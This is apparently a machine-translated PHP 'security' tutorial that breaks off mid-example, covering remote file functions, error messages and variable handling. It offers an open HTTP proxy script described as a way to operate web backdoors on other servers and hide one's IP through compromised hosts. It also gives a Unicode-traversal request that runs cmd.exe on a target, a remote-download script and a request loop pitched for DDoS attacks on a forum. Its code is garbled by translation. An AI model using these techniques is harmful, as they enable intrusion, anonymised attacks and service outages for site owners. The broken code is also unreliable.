PHP's alternative application in security

Safety 1. Remote Files
　　
PHP is a rich language, it provides a large number of functions, so that programmers can easily implement a variety of functions, remote files is a good example:
Code
<?php
$fp = @Fopen ($url, "R") or Die ("Cannot open $url");
while ($line = @fgets ($fp, 1024)) {
$contents. = $line;
}
Echo $contents; Show file contents
Fclose ($FP); Close File
?>
　　
The above is a piece of code that uses the Fopen function to open a file, because the fopen function supports remote files, making it interesting to use, save the above code as proxy.php, and then submit:
　　
Code
/proxy.php?url=http://www.hacker.com.cn/bbs
　　
　　
At this point you will find that the IP address displayed below the forum becomes the IP address of the server where the PHP script is located. The fopen function can read files from any Web or FTP site, and in fact most of PHP's file-handling functions are transparent to remote files, such as requests:
　　
Code
/proxy.php?url=http://target/script/..%c1%1c../winnt/system32/cmd.exe?/c+dir
　　
This actually leverages the Unicode vulnerability on the target host and executes the dir command. But not all servers support remote file functionality, if you are using a commercial server, you will likely find that remote files can not be used (such as 51 of the virtual host), this is because on the commercial host to restrict the function of remote files, often better to protect the server's normal operation. You can see if the server supports this feature by Phpinfo (). Of course, you can also use Get_cfg_var () when phpinfo () is disabled:
　　
Code
<?php
echo "Whether remote files (allow_url_fopen) are allowed";
? php
if (Get_cfg_var ("allow_url_fopen") = = "1")
{
Echo ("<font color=green><b> is </b></font>");
}
else echo ("<font color=red><b> </b></font>");
?>
　　
The ability to support remote files is supported when a parameter of Allow_url_fopen is on. Give full play to the characteristics of remote files, we can achieve a number of special features: If you are using the latest version of PHP flame, you will find it in the Set folder replication, text search and other functions based on the addition of the Web file transfer function, depending on this function, You are free to transfer files from other servers to your web directory. Also, transferring files between two servers has a fast transmission speed. Let's look at the code that implements this feature:
　　
Code
<?php
$fp = Fopen ($_get[' filename '], ' RB '); Open File
$data = $tmp = ';
while (true) {
$tmp = fgets ($fp, 1024);
if (0 = = strlen ($tmp)) {
Break Jump out of the while loop
}
$data. = $tmp;
}
Fclose ($FP); Close File
$file =preg_replace ("/^.+\//", "", $filename);//Convert file name
Write
$fp = Fopen ("$file", ' WB '); Generating files
Fwrite ($fp, $data); Write Data
Fclose ($FP);
?>
　　
Adding the "B" tag when calling the fopen and Fwrite functions allows the two functions to be safely used for binary files without damaging the data. In the above script submission:
/down.php?filename=http://www.chinaz.com/winrar.zip
The corresponding Winrar.zip file is generated in the down.php directory. If you go through the function of the directory again, you will be able to implement the transfer between multiple folder servers. However, there should be more space for remote files, such as automatic scripting of SQL injection attacks, or even HTTP proxy services:
　　
Code
?
$url = getenv ("query_string");
if (!ereg ("^http", $url))//Check the URL format entered
{
echo "Example:<br>http://www.163.com/<br>";
echo "Http://www.xxxx.com/list.php?id=600<br>";
echo "When the URL is a directory, you need to add"/"after the directory;
Exit
}
if ($url)
$url =str_replace ("\", "/", $url);
$f = @Fopen ($url, "R"); Open File
$a = "";
if ($f)
{
while (!feof ($f))
$a. = @fread ($f, 8000); Reading files
Fclose ($f);
}
$rooturl = Preg_replace ("/(. +\/) (. *)/I", "\\1", $url); Convert root directory
$a = Preg_replace ("/(src[[:space:]]*=[' \"]) ([^h].*?) /is "," \\1$rooturl\\2 ", $a);
$a = Preg_replace ("/(src[[:space:]]*=) ([^h ' \"].*?)　/is "," \\1$rooturl\\2 ", $a); Convert picture Address
$a = Preg_replace ("/(action[[:space:]]*=[' \"]) ([^h].*?) /is "," \\1$php_self $rooturl \\2 ", $a);
$a = Preg_replace ("/(action[[:space:]]*=) ([^h ' \"].*?)　/is "," \\1$php_self $rooturl \\2 ", $a); Convert post Address
$a = Preg_replace ("/(<a.+?href[[:space:]]*=[' \"]) ([^h].*?) /is "," \\1$php_self $rooturl \\2 ", $a);
$a = Preg_replace ("/(<a.+?href[[:space:]]*=[^ ' \"]) ([^h].*?) /is "," \\1$php_self? $rooturl \\2 ", $a);//Convert link address
$a = Preg_replace ("/(link.+?href[[:space:]]*=[^ ' \"]) (. *?) /is "," \\1$rooturl\\2 ", $a);
$a = Preg_replace ("/(link.+?href[[:space:]]*=[' \"]) (. *?) /is "," \\1$rooturl\\2 ", $a); Convert style sheet Address
echo $a;
Exit
?>
　　
With the help of regular expressions, the above code can transform the links and pictures contained in the return page and automatically submit the links within the page to the $url of the current PHP script. For example, submit:
/proxy.php?http://www.xfocus.net/
The script will return the contents of the http://www.xfocus.net/.
　　
Of course, this is absolutely not just a framework of skills. Using this script you can remotely operate the web back door of other servers, or make a simple HTTP proxy for the broiler, thus better hide your IP. If you use PHP to write a CGI scan tool, you need to extend PHP's effective uptime. Here are two effective methods, of course, you can also compile the PHP code into a GUI interface to solve this problem. Set PHP to run for three minutes:
　　
Code
? Ini_set ("Max_execution_time", 60*3);?>
? Set_time_limit (60*3);?>
　　
Let's take a look at the application of this feature in DDoS attacks:
　　
Code
<?php
Set_time_limit (60*3);
$url = "http://www.xxx.com/bbs/userlist.php?userid=";
For ($i =1131 $i <=1180; $i + +)
{
$urls = $url. $i; Link $url with $i
$f = @Fopen ($urls, "R"); Request $urls
$a = @fread ($f, 10); Remove part of the content
Fclose ($f); Close $urls
}
?>
　　
The above constant request for userlist.php?userid= $i content with A for loop ($i values are different each time), but only a few bytes after it is turned off the script. PHP runs on the virtual host, 10 seconds can open dozens of URLs, when running multiple processes at the same time, it is possible to achieve DDoS attacks, let the other side of the forum quickly collapse.
　　
Limited to the layout, the contents of the remote file first said here, if you still do not understand the place, please refer to the following article: "Using remote files in PHP"
　　
2. Error echo
　　
PHP turns On error echo by default, which makes it easier for programmers to discover code errors while debugging scripts, but it also exposes the Web to PHP code and server data. PHP is more stringent on code requirements, the following is a more common error echo:
Warning:file ("Data/1120\ '. htm)-no such file or
Directory in/usr/home/xxxxx.com/show.php on line 300
This error echo, at least tells us three information: the server's operating system is Linux; the server uses a text database; The No. 300 line of code for show.php is "file (./data/1120/". $data. ". HTM ")".
This error echo is enough to be a fatal vulnerability for a single server. From another point of view, we found that the generic PHP error back contains "warning" characters, but what's the use? We need to get to know PHP's library files first.
PHP's include () and require () are primarily designed to support the code base, because we generally put some of the functions often used in a separate file, this independent file is the code base, when you need to use the function, we just have to include this code library in the current file.
Initially, when people developed and published PHP programs, in order to distinguish between code base and main program code, they typically set an ". Inc" extension for the code base file, but they quickly discovered that this was a mistake because such a file could not be correctly parsed into PHP code by the PHP interpreter. If we directly request this file on the server, we will get the source code of the file, because when PHP is used as an Apache module, the PHP interpreter is based on the file extension to determine whether to parse the PHP code. The extension is specified by the site administrator, typically ". php", ". PhP3" and ". PhP4". If important configuration data is contained in a PHP file that does not have an appropriate extension, remote attackers will get this information easily.
According to the habits of the programmers of the past, often put some important documents "Config.inc", "Coon.inc" and other forms, if we search in the search for "Warning+config.inc", then you will find that many sites have exposed the ". Inc" File code , including many business and government websites.
　　
There are usually two ways to turn off error echoing for PHP. The first is to directly modify the settings in the php.ini, which we have already introduced before; the second method is to add the code to suppress error echo in the PHP script, you can add the "@" character to the function before the call, or add the word "@" at the top of the PHP code. error_reporting (0); "For more information, please refer to the" error_reporting "section of the PHP manual.
　　
3. Variable echo
　　
The Wen security problem mainly focuses on the processing of variables, and improper handling of variables can lead to multiple security problems. First look at the example:
　　
Code
&LT;TD width= ">"
<select name= "Face" >
<option value= "1.gif" >1.gif</option>
<option value= "2.gif" >2.gif